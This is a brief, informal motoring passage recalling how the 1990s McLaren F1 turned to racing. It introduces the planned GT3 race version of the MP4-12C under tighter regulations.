Back in the 90s, when McLaren rolled out it’s now-legendary McLaren F1, racing was never on the agenda. Mind you, after a couple of cups of tea and a brainwave, the team decided to hit the track, take on the best, and ultimately destroy them. Good decision!

So when the MP4-12C was mooted, a race car version was always going to be in the plans. But this time, the rule books would dictate that the task would be a far greater challenge than before – GT3 regulations are far tighter these days. It’s not stopping the boys from Woking giving it a fair crack though.
